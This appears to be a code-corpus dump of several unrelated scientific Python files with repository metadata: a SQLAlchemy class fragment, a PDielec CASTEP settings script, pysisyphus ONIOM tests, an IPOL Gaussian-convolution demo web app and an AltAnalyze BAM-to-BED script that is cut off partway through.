class AnnotatedColumnElement(Annotated):
def __init__(self, element, values):
Annotated.__init__(self, element, values)
ColumnElement.comparator._reset(self)
for attr in ('name', 'key', 'table'):
if self.__dict__.get(attr, False) is None:
self.__dict__.pop(attr)
def _with_annotations(self, values):
clone = super(AnnotatedColumnElement, self)._with_annotations(values)
ColumnElement.comparator._reset(clone)
return clone
@util.memoized_property
def name(self):
"""pull 'name' from parent, if not present"""
return self._Annotated__element.name
@util.memoized_property
def table(self):
"""pull 'table' from parent, if not present"""
return self._Annotated__element.table
@util.memoized_property
def key(self):
"""pull 'key' from parent, if not present"""
return self._Annotated__element.key
@util.memoized_property
def info(self):
return self._Annotated__element.info
@util.memoized_property
def anon_label(self):
return self._Annotated__element.anon_label
|
gdimitris/FleetManagerBackend
|
virtual_env/lib/python2.7/site-packages/sqlalchemy/sql/elements.py
|
Python
|
mit
| 133,000
|
[
"VisIt"
] |
f91cd08116cfb4a31ba1631d597833d2dfb342b366d84b1f79a6a276ca8ad51c
|
#
# mainTab
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
#
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
tab.settings['Excel file name'] = ''
tab.settings['QM program'] = ''
#
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = False
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 10
tab.settings['Mass definition'] = 'average'
tab.sigmas_cm1 = [10, 10, 10, 10, 10, 10]
#
#
tab = self.notebook.scenarios[0]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 3.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.1500292973489613
tab.settings['Volume fraction'] = 0.1
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Maxwell-Garnett'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Legend'] = 'Maxwell-Garnett vf=0.1 Sphere'
#
#
self.notebook.addScenario()
tab = self.notebook.scenarios[1]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 3.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.24
tab.settings['Mass fraction'] = 0.19400144183816012
tab.settings['Volume fraction'] = 0.1
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 0
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Maxwell-Garnett'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Legend'] = 'Maxwell-Garnett bubbles'
#
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 0
tab.settings['Maximum frequency'] = 400
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Number of atoms'] = 1
tab.settings['Plot title'] = 'Castep MgO'
tab.settings['concentration'] = 86.71312720248292
#
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 400
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
#
tab = self.notebook.viewerTab
tab.settings['Atom scaling'] = 0.5
tab.settings['Maximum displacement'] = 1.0
tab.settings['Bond colour'] = [80, 80, 80, 255]
tab.settings['Bond radius'] = 0.1
tab.settings['Cell colour'] = [255, 0, 0, 255]
tab.settings['Cell radius'] = 0.1
tab.settings['Background colour'] = [120, 120, 120, 255]
tab.settings['Arrow colour'] = [0, 255, 0, 255]
tab.settings['Arrow radius'] = 0.07
tab.settings['Number of phase steps'] = 41
#
#
tab = self.notebook.fitterTab
tab.settings['Excel file name'] = ''
tab.settings['Plot title'] = 'Experimental and Calculated Spectral Comparison'
tab.settings['Plot type'] = 'Molar absorption'
tab.settings['Fitting type'] = 'Minimise x-correlation'
tab.settings['Number of iterations'] = 20
tab.settings['Frequency scaling'] = False
tab.settings['Frequency scaling factor'] = 1.0
tab.settings['Absorption scaling'] = False
tab.settings['Absorption scaling factor'] = 1.0
tab.settings['Independent y-axes'] = True
tab.settings['Spectral difference threshold'] = 0.05
tab.settings['HPFilter lambda'] = 7.0
tab.settings['Baseline removal'] = False
|
JohnKendrick/PDielec
|
Examples/Castep/Bubbles/script.py
|
Python
|
mit
| 4,195
|
[
"CASTEP"
] |
92d49e589ab91a40bf38bd4131e610e07e32cdb655a496bb253cec36c83f9ff6
|
import pytest
from pysisyphus.run import run_from_dict
from pysisyphus.testing import using
@pytest.mark.skip
@using("xtb")
def test_oniom_opt_big():
run_dict = {
"geom": {
"type": "redund",
# frag.py raffinose.xyz 21 14 33 10
"fn": "lib:birkholz/raffinose.xyz",
},
"calc": {
"type": "oniom",
"calcs": {
"real": {
"type": "xtb",
"gfn": 0,
"pal": 6,
"quiet": True,
},
"high": {
"type": "xtb",
"gfn": 2,
"pal": 6,
"quiet": True,
},
},
"models": {
"high": {
"inds": "11..21,33..36,50..57",
"calc": "high",
},
},
},
"opt": {
"thresh": "gau_loose",
},
}
results = run_from_dict(run_dict)
assert results.opt_geom.energy == pytest.approx(-110.75489874)
@using("xtb")
@pytest.mark.parametrize(
"opt_dict",
[
{
"type": "rfo",
},
{
"type": "lbfgs",
"line_search": True,
},
{
"type": "oniom",
},
],
ids=["rfo_ref", "lbfgs_ref", "oniom"],
)
def test_oniom_opt_small(opt_dict):
opt_dict.update({
"thresh": "gau",
"step": "full",
# "step": "high",
"dump": True,
})
run_dict = {
"geom": {"type": "cart", "fn": "lib:acetaldehyd_oniom.xyz"},
"calc": {
"type": "oniom",
"calcs": {
"real": {
"type": "xtb",
"gfn": 0,
"pal": 6,
"quiet": True,
},
"high": {
"type": "xtb",
"gfn": 2,
"pal": 6,
"quiet": True,
},
},
"models": {
"high": {
"inds": [4, 5, 6],
"calc": "high",
},
},
},
"opt": opt_dict,
}
results = run_from_dict(run_dict)
assert results.opt_geom.energy == pytest.approx(-10.419331913)
@pytest.mark.skip
def test_dmp():
run_dict = {
# "geom": {"type": "cart", "fn": "inp.xyz"},
"geom": {"type": "redund", "fn": "inp.xyz"},
"calc": {
"type": "oniom",
"calcs": {
"real": {
"type": "pyscf",
"basis": "sto3g",
"pal": 2,
"verbose": 0,
},
"high": {
"type": "pyscf",
"basis": "321g",
"pal": 2,
"verbose": 0,
},
},
"models": {
"high": {
"inds": [15, 14, 1, 0],
"calc": "high",
},
},
},
# "opt": {
# "type": "oniom",
# # "thresh": "gau_loose",
# "thresh": "gau",
# },
"opt": {"thresh": "gau"},
}
results = run_from_dict(run_dict)
# assert results.opt_geom.energy == pytest.approx(-10.419331913)
|
eljost/pysisyphus
|
tests_staging/test_oniom_opt/test_oniom_opt.py
|
Python
|
gpl-3.0
| 3,472
|
[
"PySCF",
"xTB"
] |
e286d71fc83e9b9b07ebe79ebd587bdc489b26ea37468e340d528c034070fe78
|
"""
Gaussian Convolution ipol demo web app
"""
from lib import base_app, build, http, image
from lib.misc import ctime
from lib.base_app import init_app
from lib.config import cfg_open
import shutil
import cherrypy
from cherrypy import TimeoutError
import os.path
import time
class app(base_app):
""" Gaussian Convolution app """
title = 'A Survey of Gaussian Convolution Algorithms'
input_nb = 1
input_max_pixels = 700 * 700 # max size (in pixels) of input image
input_max_weight = 10 * 1024 * 1024 # max size (in bytes) of input file
input_dtype = '3x8i' # input image expected data type
input_ext = '.png' # expected extension
is_test = False
xlink_article = "http://www.ipol.im/pub/pre/87/"
algos = ['fir', 'dct',
'box-3', 'box-4', 'box-5',
'ebox-3', 'ebox-4', 'ebox-5',
'sii-3', 'sii-4', 'sii-5',
'am-3', 'am-4', 'am-5',
'deriche-2', 'deriche-3', 'deriche-4',
'vyv-3', 'vyv-4', 'vyv-5']
default_param = {'sigma': '5.0', # default parameters
'algo' : 'fir dct',
'x0': None,
'y0': None,
'x' : None,
'y' : None}
def __init__(self):
"""
App setup
"""
# Setup the parent class
base_dir = os.path.dirname(os.path.abspath(__file__))
base_app.__init__(self, base_dir)
# Select the base_app steps to expose
# index() and input_xxx() are generic
base_app.index.im_func.exposed = True
base_app.input_select.im_func.exposed = True
base_app.input_upload.im_func.exposed = True
# params() is modified from the template
base_app.params.im_func.exposed = True
# result() is modified from the template
base_app.result.im_func.exposed = True
# Generate a new timestamp
self.timestamp = int(100*time.time())
def build(self):
"""
Program build/update
"""
# Store common file path in variables
archive = 'gaussian_20131215'
tgz_url = 'http://www.ipol.im/pub/art/2013/87/' + archive + '.tgz'
tgz_file = self.dl_dir + archive + '.tgz'
progs = ['gaussian_demo', 'imdiff']
src_bin = dict([(self.src_dir + os.path.join(archive, prog),
self.bin_dir + prog)
for prog in progs])
log_file = self.base_dir + 'build.log'
# Get the latest source archive
build.download(tgz_url, tgz_file)
# Test if any dest file is missing, or too old
if all([(os.path.isfile(bin_file)
and ctime(tgz_file) < ctime(bin_file))
for bin_file in src_bin.values()]):
cherrypy.log('no rebuild needed',
context='BUILD', traceback=False)
else:
# Extract the archive
build.extract(tgz_file, self.src_dir)
# Build the programs
build.run("make -C %s %s"
% (self.src_dir + archive, " ".join(progs))
+ " --makefile=makefile.gcc"
+ " CXX='ccache c++' -j4", stdout=log_file)
# Save into bin dir
if os.path.isdir(self.bin_dir):
shutil.rmtree(self.bin_dir)
os.mkdir(self.bin_dir)
for (src, dst) in src_bin.items():
shutil.copy(src, dst)
# Cleanup the source dir
shutil.rmtree(self.src_dir)
return
#
# PARAMETER HANDLING
#
@cherrypy.expose
@init_app
def params(self, newrun=False, msg=None):
"""
Configure the algo execution
"""
if newrun:
old_work_dir = self.work_dir
self.clone_input()
# Keep old parameters
self.cfg['param'] = cfg_open(old_work_dir
+ 'index.cfg', 'rb')['param']
# Also need to clone input_0_sel.png in case the user is running
# with new parameters but on the same subimage.
shutil.copy(old_work_dir + 'input_0_sel.png',
self.work_dir + 'input_0_sel.png')
# Set undefined parameters to default values
self.cfg['param'] = dict(self.default_param, **self.cfg['param'])
# Generate a new timestamp
self.timestamp = int(100 * time.time())
# Reset cropping parameters if running with a different subimage
if msg == 'different subimage':
self.cfg['param']['x0'] = None
self.cfg['param']['y0'] = None
self.cfg['param']['x'] = None
self.cfg['param']['y'] = None
self.cfg.save()
return self.tmpl_out('params.html')
@cherrypy.expose
@init_app
def wait(self, **kwargs):
"""
Run redirection
"""
# Read webpage parameters from kwargs, but only those that
# are defined in the default_param dict. If a parameter is not
# defined by kwargs, the value from default_param is used.
self.cfg['param'] = dict(self.default_param.items() +
[(p,kwargs[p]) for p in self.default_param.keys() if p in kwargs])
# Generate a new timestamp
self.timestamp = int(100 * time.time())
if not isinstance(self.cfg['param']['algo'], basestring):
self.cfg['param']['algo'] = ' '.join(self.cfg['param']['algo'])
self.cfg['param']['sigma'] = \
str(max(float(self.cfg['param']['sigma']), 0.5))
if not 'action' in kwargs:
# Select a subimage
x = self.cfg['param']['x']
y = self.cfg['param']['y']
x0 = self.cfg['param']['x0']
y0 = self.cfg['param']['y0']
if x != None and y != None:
img = image(self.work_dir + 'input_0.png')
if x0 == None or y0 == None:
# (x,y) specifies the first corner
(x0, y0, x, y) = (int(x), int(y), None, None)
# Draw a cross at the first corner
img.draw_cross((x0, y0), size=4, color="white")
img.draw_cross((x0, y0), size=2, color="red")
else:
# (x,y) specifies the second corner
(x0, x) = sorted((int(x0), int(x)))
(y0, y) = sorted((int(y0), int(y)))
assert (x - x0) > 0 and (y - y0) > 0
# Crop the image
# Check if the original image is a different size, which is
# possible if the input image is very large.
imgorig = image(self.work_dir + 'input_0.orig.png')
if imgorig.size != img.size:
s = float(imgorig.size[0])/float(img.size[0])
imgorig.crop(tuple([int(s*v) for v in (x0, y0, x, y)]))
img = imgorig
else:
img.crop((x0, y0, x, y))
img.save(self.work_dir + 'input_0_sel.png')
self.cfg['param']['x0'] = x0
self.cfg['param']['y0'] = y0
self.cfg['param']['x'] = x
self.cfg['param']['y'] = y
self.cfg.save()
return self.tmpl_out('params.html')
else:
if any(self.cfg['param'][p] == None \
for p in ['x0', 'y0', 'x', 'y']):
img0 = image(self.work_dir + 'input_0.png')
img0.save(self.work_dir + 'input_0_sel.png')
self.cfg.save()
http.refresh(self.base_url + 'run?key=%s' % self.key)
return self.tmpl_out("wait.html")
@cherrypy.expose
@init_app
def run(self):
"""
Algorithm execution
"""
# Run the algorithm
stdout = open(self.work_dir + 'stdout.txt', 'w')
try:
run_time = time.time()
self.run_algo(stdout=stdout)
self.cfg['info']['run_time'] = time.time() - run_time
self.cfg.save()
except TimeoutError:
return self.error(errcode='timeout')
except RuntimeError:
print "Run time error"
return self.error(errcode='runtime')
stdout.close()
http.redir_303(self.base_url + 'result?key=%s' % self.key)
# Archive
if self.cfg['meta']['original']:
ar = self.make_archive()
ar.add_file("input_0_sel.png",
info="selected subimage")
for algo in self.cfg['param']['algo'].split():
ar.add_file('output-' + algo + '.png',
info='output ' + algo)
ar.add_info({'sigma': self.cfg['param']['sigma']})
ar.add_info({'algorithm': self.cfg['param']['algo']})
ar.save()
return self.tmpl_out("run.html")
def run_algo(self, stdout=None):
"""
The core algo runner
could also be called by a batch processor
this one needs no parameter
"""
timeout = False
p = []
algo_list = [algo for algo in self.cfg['param']['algo'].split()
if algo in self.algos]
if len(algo_list) == 0:
algo_list = self.default_param['algo'].split()
sigma = float(self.cfg['param']['sigma'])
if sigma <= 2.0:
exact_algo = 'fir'
self.cfg['param']['exact_algo'] = (
'FIR, <i>tol</i>=10<sup>−15</sup>,')
else:
exact_algo = 'dct'
self.cfg['param']['exact_algo'] = 'DCT'
p.append(self.run_proc(['gaussian_demo',
'-s', str(sigma),
'-a', exact_algo,
'-t1e-15',
'input_0_sel.png', 'output-exact.png'],
stdout=stdout, stderr=stdout))
for algo in algo_list:
s = algo.split('-')
a = s[0]
K = '3'
if len(s) == 2:
K = s[1]
p.append(self.run_proc(['gaussian_demo',
'-s', str(sigma),
'-a' + a,
'-K' + K,
'input_0_sel.png', 'output-' + algo + '.png'],
stdout=stdout, stderr=stdout))
self.wait_proc(p, timeout)
# Compute metrics
self.wait_proc(
[self.run_proc(['imdiff',
'output-exact.png', 'output-' + algo + '.png'],
stdout=open(self.work_dir
+ 'metrics_' + algo + '.txt', 'w'), stderr=stdout)
for algo in algo_list], timeout)
# Read the metrics_*.txt files
for algo in algo_list:
try:
f = open(self.work_dir
+ 'metrics_' + algo + '.txt', 'r')
self.cfg['param'][algo + '_maxdiff'] = \
float(f.readline().split(':',1)[1])
self.cfg['param'][algo + '_rmse'] = \
float(f.readline().split(':',1)[1])
self.cfg['param'][algo + '_psnr'] = \
float(f.readline().split(':',1)[1])
f.close()
except Exception:
self.cfg['param'][algo + '_maxdiff'] = -1
self.cfg['param'][algo + '_rmse'] = -1
self.cfg['param'][algo + '_psnr'] = -1
self.cfg['param']['algo'] = ' '.join(algo_list)
self.cfg['param']['displayheight'] = max(50 + 40 * len(algo_list), \
image(self.work_dir + 'input_0_sel.png').size[1])
self.cfg.save()
@cherrypy.expose
@init_app
def result(self, public=None):
"""
Display the algo results
SHOULD be defined in the derived classes, to check the parameters
"""
return self.tmpl_out("result.html",
stdout = open(self.work_dir + 'stdout.txt', 'r').read())
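# A minimal sketch, not used by the demo itself: run_algo() above splits
# algorithm ids such as 'deriche-3' into the algorithm name and an optional
# step count K, falling back to '3' when no suffix is given.
def _example_parse_algo_name(algo):
    s = algo.split('-')
    a = s[0]
    K = s[1] if len(s) == 2 else '3'
    return a, K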
|
juan-cardelino/matlab_demos
|
ipol_demo-light-1025b85/app_available/87/app.py
|
Python
|
gpl-2.0
| 12,250
|
[
"Gaussian"
] |
acd6e1c1773d1eff5717c97954caee031cf3a68e958c3727beb567f98e9bd802
|
### multiBAMtoBED.py
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
""" Batch script for extracting many junction.bed and building exon.bed files from
an input set of BAM files in a directory. Requires a reference text file containing
exon regions (currently provided from AltAnalyze - see ReferenceExonCoordinates
folder). Can produce only junction.bed files, only a combined exon reference or only
exon.bed files optionally. Can run using a single processor or multiple simultaneous
processes (--m flag)."""
import sys,string,os
sys.path.insert(1, os.path.join(sys.path[0], '..')) ### import parent dir dependencies
import export
import time
import shutil
import unique
import subprocess
from import_scripts import BAMtoJunctionBED
from import_scripts import BAMtoExonBED
import getopt
import traceback
################# General data import methods #################
def filepath(filename):
fn = unique.filepath(filename)
return fn
def cleanUpLine(line):
data = string.replace(line,'\n','')
data = string.replace(data,'\c','')
data = string.replace(data,'\r','')
data = string.replace(data,'"','')
return data
def getFolders(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' not in entry: dir_list2.append(entry)
return dir_list2
def getFiles(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' in entry: dir_list2.append(entry)
return dir_list2
def getFolders(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' not in entry: dir_list2.append(entry)
return dir_list2
def parallelBAMProcessing(directory,refExonCoordinateFile,bed_reference_dir,
analysisType=[],useExonReads=False,useMultiProcessing=False,MLP=None,root=None):
paths_to_run=[]
errors=[]
if '.bam' in directory:
### Allow a single BAM file to be specifically analyzed (e.g., bsub operation)
bam_file = directory
bam_file = string.replace(directory,'\\','/')
directory = string.join(string.split(directory,'/')[:-1],'/')
else:
bam_file = None
outputExonCoordinateRefBEDfile = str(bed_reference_dir)
bed_reference_dir = string.replace(bed_reference_dir,'\\','/')
### Check if the BAM files are located in the target folder (not in subdirectories)
files = getFiles(directory)
for file in files:
if '.bam' in file and '.bai' not in file:
source_file = directory+'/'+file
source_file = filepath(source_file)
output_filename = string.replace(file,'.bam','')
output_filename = string.replace(output_filename,'=','_')
destination_file = directory+'/'+output_filename+'__exon.bed'
destination_file = filepath(destination_file)
paths_to_run.append((source_file,refExonCoordinateFile,bed_reference_dir,destination_file,useExonReads))
### Otherwise, check subdirectories for BAM files
folders = getFolders(directory)
if len(paths_to_run)==0:
for top_level in folders:
try:
files = getFiles(directory+'/'+top_level)
for file in files:
if '.bam' in file and '.bai' not in file:
source_file = directory+'/'+file
source_file = filepath(source_file)
destination_file = directory+'/'+top_level+'__exon.bed'
destination_file = filepath(destination_file)
paths_to_run.append((source_file,refExonCoordinateFile,bed_reference_dir,destination_file,useExonReads))
except Exception: pass
### If a single BAM file is indicated
if bam_file != None:
output_filename = string.replace(bam_file,'.bam','')
output_filename = string.replace(output_filename,'=','_')
destination_file = output_filename+'__exon.bed'
paths_to_run = [(bam_file,refExonCoordinateFile,bed_reference_dir,destination_file,useExonReads)]
if 'reference' in analysisType and len(analysisType)==1:
augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile)
sys.exit()
if useMultiProcessing:
pool_size = MLP.cpu_count()
if len(paths_to_run)<pool_size:
pool_size = len(paths_to_run)
print 'Using %d processes' % pool_size
if len(paths_to_run) > pool_size:
pool_size = len(paths_to_run)
if len(analysisType) == 0 or 'junction' in analysisType:
print 'Extracting junction alignments from BAM files...',
pool = MLP.Pool(processes=pool_size)
try: results = pool.map(runBAMtoJunctionBED, paths_to_run) ### worker jobs initiated in tandem
except ValueError:
print_out = '\nWARNING!!! No Index found for the BAM files (.bam.bai). Sort and Index using Samtools prior to loading in AltAnalyze'
print traceback.format_exc()
if root!=None:
import UI
UI.WarningWindow(print_out,'Exit');sys.exit()
try:pool.close(); pool.join(); pool = None
except Exception: pass
print_out=None
for sample,missing in results:
if len(missing)>1:
print_out = '\nWarning!!! %s chromosomes not found in: %s (PySam platform-specific error)' % (string.join(missing,', '),sample)
if root!=None and print_out!=None:
try:
import UI
UI.WarningWindow(print_out,'Continue')
except Exception: pass
print len(paths_to_run), 'BAM files','processed'
if len(analysisType) == 0 or 'reference' in analysisType:
#print 'Building exon reference coordinates from Ensembl/UCSC and all junctions...',
augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile)
#print 'completed'
print 'Extracting exon alignments from BAM files...',
if len(analysisType) == 0 or 'exon' in analysisType:
pool = MLP.Pool(processes=pool_size)
results = pool.map(runBAMtoExonBED, paths_to_run) ### worker jobs initiated in tandem
try:pool.close(); pool.join(); pool = None
except Exception: pass
print len(paths_to_run), 'BAM files','processed'
else:
if len(analysisType) == 0 or 'junction' in analysisType:
for i in paths_to_run:
runBAMtoJunctionBED(i)
print '*',
print ''
if len(analysisType) == 0 or 'reference' in analysisType:
augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile)
if len(analysisType) == 0 or 'exon' in analysisType:
for i in paths_to_run:
runBAMtoExonBED(i)
print '*',
print ''
def runBAMtoJunctionBED(paths_to_run):
bamfile_dir,refExonCoordinateFile,bed_reference_dir,output_bedfile_path,useExonReads = paths_to_run
output_bedfile_path = string.replace(bamfile_dir,'.bam','__junction.bed')
#if os.path.exists(output_bedfile_path) == False: ### Only run if the file doesn't exist
results = BAMtoJunctionBED.parseJunctionEntries(bamfile_dir,multi=True,ReferenceDir=refExonCoordinateFile)
#else: print output_bedfile_path, 'already exists.'
return results
def runBAMtoExonBED(paths_to_run):
bamfile_dir,refExonCoordinateFile,bed_reference_dir,output_bedfile_path,useExonReads = paths_to_run
if useExonReads:
intronRetentionOnly = False
else:
intronRetentionOnly = True
if os.path.exists(output_bedfile_path) == False: ### Only run if the file doesn't exist
BAMtoExonBED.parseExonReferences(bamfile_dir,bed_reference_dir,multi=True,intronRetentionOnly=intronRetentionOnly)
else:
print output_bedfile_path, 'already exists... re-writing'
BAMtoExonBED.parseExonReferences(bamfile_dir,bed_reference_dir,multi=True,intronRetentionOnly=intronRetentionOnly)
def getChrFormat(directory):
### Determine if the chromosomes have 'chr' or nothing
files = getFiles(directory)
chr_status=True
for file in files:
firstLine=True
if 'junction' in file and '.bed' in file:
for line in open(directory+'/'+file,'rU').xreadlines():
if firstLine: firstLine=False
else:
t = string.split(line)
chr = t[0]
if 'chr' not in chr:
chr_status = False
break
break
return chr_status
def augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile):
print 'Building reference bed file from all junction.bed files'
splicesite_db={} ### reference splice-site database (we only want to add novel splice-sites to our reference)
real_splicesites={}
introns={}
novel_db={}
reference_toplevel = string.join(string.split(outputExonCoordinateRefBEDfile,'/')[:-1],'/')
try: os.mkdir(reference_toplevel) ### If the bed folder doesn't exist
except Exception: pass
chr_status = getChrFormat(directory)
o = open (outputExonCoordinateRefBEDfile,"w")
#refExonCoordinateFile = '/Users/saljh8/Desktop/Code/AltAnalyze/AltDatabase/EnsMart72/ensembl/Mm/Mm_Ensembl_exon.txt'
reference_rows=0
if '.gtf' in refExonCoordinateFile: firstLine = False
else: firstLine = True
for line in open(refExonCoordinateFile,'rU').xreadlines():
if firstLine: firstLine=False
else:
line = line.rstrip('\n')
reference_rows+=1
t = string.split(line,'\t'); #'gene', 'exon-id', 'chromosome', 'strand', 'exon-region-start(s)', 'exon-region-stop(s)', 'constitutive_call', 'ens_exon_ids', 'splice_events', 'splice_junctions'
geneID, exon, chr, strand, start, stop = t[:6]
if chr_status == False:
chr = string.replace(chr,'chr','')
o.write(string.join([chr,start,stop,geneID+':'+exon,'',strand],'\t')+'\n')
start = int(start); stop = int(stop)
#geneID = string.split(exon,':')[0]
splicesite_db[chr,start]=geneID
splicesite_db[chr,stop]=geneID
if 'I' in exon:
try: introns[geneID].append([start,stop])
except Exception: introns[geneID] = [[start,stop]]
files = getFiles(directory)
for file in files:
firstLine=True
if 'junction' in file and '.bed' in file:
for line in open(directory+'/'+file,'rU').xreadlines():
if firstLine: firstLine=False
else:
line = line.rstrip('\n')
t = string.split(line,'\t'); #'12', '6998470', '6998522', 'ENSG00000111671:E1.1_ENSE00001754003', '0', '-'
chr, exon1_start, exon2_stop, junction_id, reads, strand, null, null, null, null, lengths, null = t
exon1_len,exon2_len=string.split(lengths,',')[:2]; exon1_len = int(exon1_len); exon2_len = int(exon2_len)
exon1_start = int(exon1_start); exon2_stop = int(exon2_stop)
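# Convert the junction.bed anchor blocks into splice-site coordinates:
# left site = chromStart + left block length, right site = chromEnd - right
# block length + 1; on the minus strand the two exon anchors are swapped below.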
if strand == '-':
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
### Exons have the opposite order
a = exon1_start,exon1_stop; b = exon2_start,exon2_stop
exon1_stop,exon1_start = b; exon2_stop,exon2_start = a
else:
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
seq_length = abs(float(exon1_stop-exon2_start)) ### Junction distance
key = chr,exon1_stop,exon2_start
if (chr,exon1_stop) not in splicesite_db: ### record the splice site and position of the max read
if (chr,exon2_start) in splicesite_db: ### only include splice sites where one site is known
geneID = splicesite_db[(chr,exon2_start)]
novel_db[chr,exon1_stop,strand] = exon1_start,geneID,5
real_splicesites[chr,exon2_start]=None
elif (chr,exon2_start) not in splicesite_db: ### record the splice site and position of the max read
if (chr,exon1_stop) in splicesite_db: ### only include splice sites where one site is known
#if 121652702 ==exon2_start:
#print chr, exon1_start,exon1_stop,exon2_start,exon2_stop, strand;sys.exit()
geneID = splicesite_db[(chr,exon1_stop)]
novel_db[chr,exon2_start,strand] = exon2_stop,geneID,3
real_splicesites[chr,exon1_stop]=None
else:
real_splicesites[chr,exon1_stop]=None
real_splicesites[chr,exon2_start]=None
print len(novel_db), 'novel splice sites and', len(real_splicesites), 'known splice sites.'
gene_organized={}
for (chr,pos1,strand) in novel_db:
pos2,geneID,type = novel_db[(chr,pos1,strand)]
try: gene_organized[chr,geneID,strand].append([pos1,pos2,type])
except Exception: gene_organized[chr,geneID,strand] = [[pos1,pos2,type]]
def intronCheck(geneID,coords):
### see if the coordinates are within a given intron
try:
for ic in introns[geneID]:
if withinQuery(ic,coords):
return True
except Exception:
pass
def withinQuery(ls1,ls2):
imax = max(ls1)
imin = min(ls1)
qmax = max(ls2)
qmin = min(ls2)
if qmin >= imin and qmax <= imax:
return True
else:
return False
### Compare the novel splice site locations in each gene
added=[]
for (chr,geneID,strand) in gene_organized:
gene_organized[(chr,geneID,strand)].sort()
if strand == '-':
gene_organized[(chr,geneID,strand)].reverse()
i=0
set = gene_organized[(chr,geneID,strand)]
for (pos1,pos2,type) in set:
k = [pos1,pos2]
annotation='novel'
if i==0 and type == 3:
if len(set)>1:
if set[i+1][-1]==5:
l = [set[i+1][0],pos1]
if (max(l)-min(l))<300 and intronCheck(geneID,l):
k=l
#print chr,k
annotation='novel-paired'
elif type == 5:
if set[i-1][-1]==3:
l = [set[i-1][0],pos1]
if (max(l)-min(l))<300 and intronCheck(geneID,l):
k=l
#print chr,k
annotation='novel-paired'
k.sort(); i+=1
if k not in added:
values = string.join([chr,str(k[0]),str(k[1]),geneID+':'+annotation,'',strand],'\t')+'\n'
added.append(k)
o.write(values)
o.close()
if __name__ == '__main__':
import multiprocessing as mlp
refExonCoordinateFile = ''
outputExonCoordinateRefBEDfile = ''
#bam_dir = "H9.102.2.6.bam"
#outputExonCoordinateRefBEDfile = 'H9.102.2.6__exon.bed'
################ Comand-line arguments ################
if len(sys.argv[1:])<=1: ### Indicates that there are insufficient number of command-line arguments
print "Warning! Please designate a directory containing BAM files as input in the command-line"
print "Example: python multiBAMtoBED.py --i /Users/me/BAMfiles --g /Users/me/ReferenceExonCoordinates/Hs_Ensembl_exon_hg19.txt --r /Users/me/ExonBEDRef/Hs_Ensembl_exon-cancer_hg19.bed --a exon --a junction --a reference"
print "Example: python multiBAMtoBED.py --i /Users/me/BAMfiles --a junction"
sys.exit()
else:
analysisType = []
useMultiProcessing=False
options, remainder = getopt.getopt(sys.argv[1:],'', ['i=','g=','r=','a=','m='])
for opt, arg in options:
if opt == '--i': bam_dir=arg
elif opt == '--g': refExonCoordinateFile=arg
elif opt == '--r': outputExonCoordinateRefBEDfile=arg
